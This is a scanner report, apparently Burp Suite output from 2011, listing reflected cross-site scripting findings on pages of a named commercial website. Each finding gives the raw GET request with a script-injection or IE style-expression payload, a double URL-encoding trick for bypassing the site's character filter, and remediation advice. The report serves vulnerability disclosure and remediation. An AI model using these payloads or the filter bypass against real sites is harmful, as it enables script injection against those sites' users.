HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/ Set-Cookie: ASP.NET_SessionId=obr3du45zbuce445aaaygqnk; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75 was submitted in the REST URL parameter 3. This input was echoed as 1b6e6"><script>alert(1)</script>255e7c83b75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75?id=343769/x22/x3eBuy HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:30 GMT Content-Length: 8886 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: ASP.NET_SessionId=c2zv45jn1eebgs45s0y1xfqm; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 was submitted in the REST URL parameter 3. This input was echoed as 6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/buy-sd.htm6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1q0jrzerd2axjnu1z4yq5c55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8830 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670 was submitted in the REST URL parameter 3. This input was echoed as 2c172"><script>alert(1)</script>9f436bf2670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/buy-sd.htm2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670?id=343769/x22/x3eBuy HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/ Set-Cookie: ASP.NET_SessionId=iunkdq55f4mrs0zhymery055; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8949 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420fb"><script>alert(1)</script>680e9c0cc7 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e89d"><script>alert(1)</script>e8ef8708314 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.59. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/sd/buy-sd.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaa"><script>alert(1)</script>366bac39d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.60. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/sd/buy-sd.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f2b"><script>alert(1)</script>00c78a59a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8 was submitted in the REST URL parameter 2. This input was echoed as fff10"><script>alert(1)</script>a7102c9c5a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/smartdraw.aspfff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8?id=104640/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1kyde4v2dk5z4w45pkuoyr55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8900 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a was submitted in the REST URL parameter 2. This input was echoed as 16ab3"style="x:expression(alert(1))"63feb98e41a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/ Set-Cookie: ASP.NET_SessionId=xznk3xfpvt4fwq45lltljxjn; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8746 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 was submitted in the REST URL parameter 2. This input was echoed as 46591"style="x:expression(alert(1))"94313ed1278 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: ASP.NET_SessionId=2ksoxp55cqqywc453rftb3vt; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8746 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217 was submitted in the REST URL parameter 2. This input was echoed as 1fb77"><script>alert(1)</script>1ed6dd36217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217?id=104640/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/ Set-Cookie: ASP.NET_SessionId=rgc5ewevo3ic5ebzjtk3pcfy; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9eb8"><script>alert(1)</script>02409d83cd8 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bb8"><script>alert(1)</script>626eeb09dab was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.67. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/smartdraw.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6931"><script>alert(1)</script>1538439b5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.68. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/smartdraw.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a0d8"><script>alert(1)</script>19f5f3d2721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21 was submitted in the REST URL parameter 1. This input was echoed as 5cd21"style="x:expression(alert(1))"9340ce36f21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0vrtws45owfyd0ykewtjomyf; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2 was submitted in the REST URL parameter 1. This input was echoed as 37c3c"style="x:expression(alert(1))"e679ad699d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=o1ruv145ogifusajxf15cv45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 was submitted in the REST URL parameter 2. This input was echoed as 5ce71"style="x:expression(alert(1))"1f48f65f3b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support/5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:09 GMT Content-Length: 8739 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/ Set-Cookie: ASP.NET_SessionId=lyrquzi1ro0haeato0nugmis; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 was submitted in the REST URL parameter 2. This input was echoed as 20991"style="x:expression(alert(1))"284b0792e42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support/x2220991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: ASP.NET_SessionId=oo5bbiaclrpecvf51w0jwaml; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.73. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/support/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396ed"style%3d"x%3aexpression(alert(1))"eac095684e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 396ed"style="x:expression(alert(1))"eac095684e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /support/x22?396ed"style%3d"x%3aexpression(alert(1))"eac095684e0=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:49 GMT Content-Length: 8781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/ Set-Cookie: ASP.NET_SessionId=2smue255v4gtmz55m2l3rh45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.74. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/support/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79e74"style="x:expression(alert(1))"af3d991af1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /support/x22?79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
